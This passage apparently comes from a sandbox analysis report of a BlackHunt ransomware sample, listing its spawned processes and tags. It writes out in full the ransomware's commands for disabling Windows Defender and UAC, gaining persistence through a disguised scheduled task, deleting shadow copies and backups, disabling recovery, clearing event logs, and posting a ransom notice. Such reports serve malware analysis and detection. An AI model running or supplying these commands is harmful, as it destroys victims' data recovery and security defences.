7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 120 PID 2316 wrote to memory of 4152 2316 cmd.exe 123 PID 2316 wrote to memory of 4152 2316 cmd.exe 123 PID 3176 wrote to memory of 1884 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 193 PID 3176 wrote to memory of 1884 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 193 PID 5072 wrote to memory of 3884 5072 cmd.exe 126 PID 5072 wrote to memory of 3884 5072 cmd.exe 126 PID 2360 wrote to memory of 4060 2360 reg.exe 127 PID 2360 wrote to memory of 4060 2360 reg.exe 127 PID 3176 wrote to memory of 3080 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 128 PID 3176 wrote to memory of 3080 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 128 PID 1648 wrote to memory of 4336 1648 cmd.exe 130 PID 1648 wrote to memory of 4336 1648 cmd.exe 130 PID 3176 wrote to memory of 2712 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 131 PID 3176 wrote to memory of 2712 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 131 PID 3176 wrote to memory of 4340 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 203 PID 3176 wrote to memory of 4340 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 203 PID 1884 wrote to memory of 3280 1884 vssadmin.exe 133 PID 1884 wrote to memory of 3280 1884 vssadmin.exe 133 PID 3176 wrote to memory of 4912 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 135 PID 3176 wrote to memory of 4912 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 135 PID 3176 wrote to memory of 3484 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 138 PID 3176 wrote to memory of 3484 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 138 PID 3176 wrote to memory of 844 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 140 PID 3176 wrote to memory of 844 3176 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe"C:\Users\Admin\AppData\Local\Temp\7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3176 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:3828
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3080
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2712
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4340
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:3828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4276
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:3472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:3672 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3336
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:556
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe" /F2⤵PID:2804
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe" /F3⤵
- Creates scheduled task(s)
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1008
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4956
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3052
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
- Suspicious use of WriteProcessMemory
PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5096
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4844
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3852
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:5896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2784
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4340
-
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4020
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2240
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:11124
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:9208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:9652
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:9196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:7064
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:7208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10852
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:10772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10848
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:10820
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:10796
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:12540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5884
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:11344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:10808
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:12520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:10276
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:10804
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:15828
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:8916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7284
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:8992
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11348
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:7724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1532
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:12504
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8220
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:6168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:10012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2260
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:8488 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:8448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8448 -s 14604⤵
- Program crash
PID:6120
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7a54e347ef5509b6eaaad9814e9a23372f75bf506757846f5869925162d0599a.exe"2⤵PID:13928
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:11104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8300
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:5336
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7892
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:13008
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:14172
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15916
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
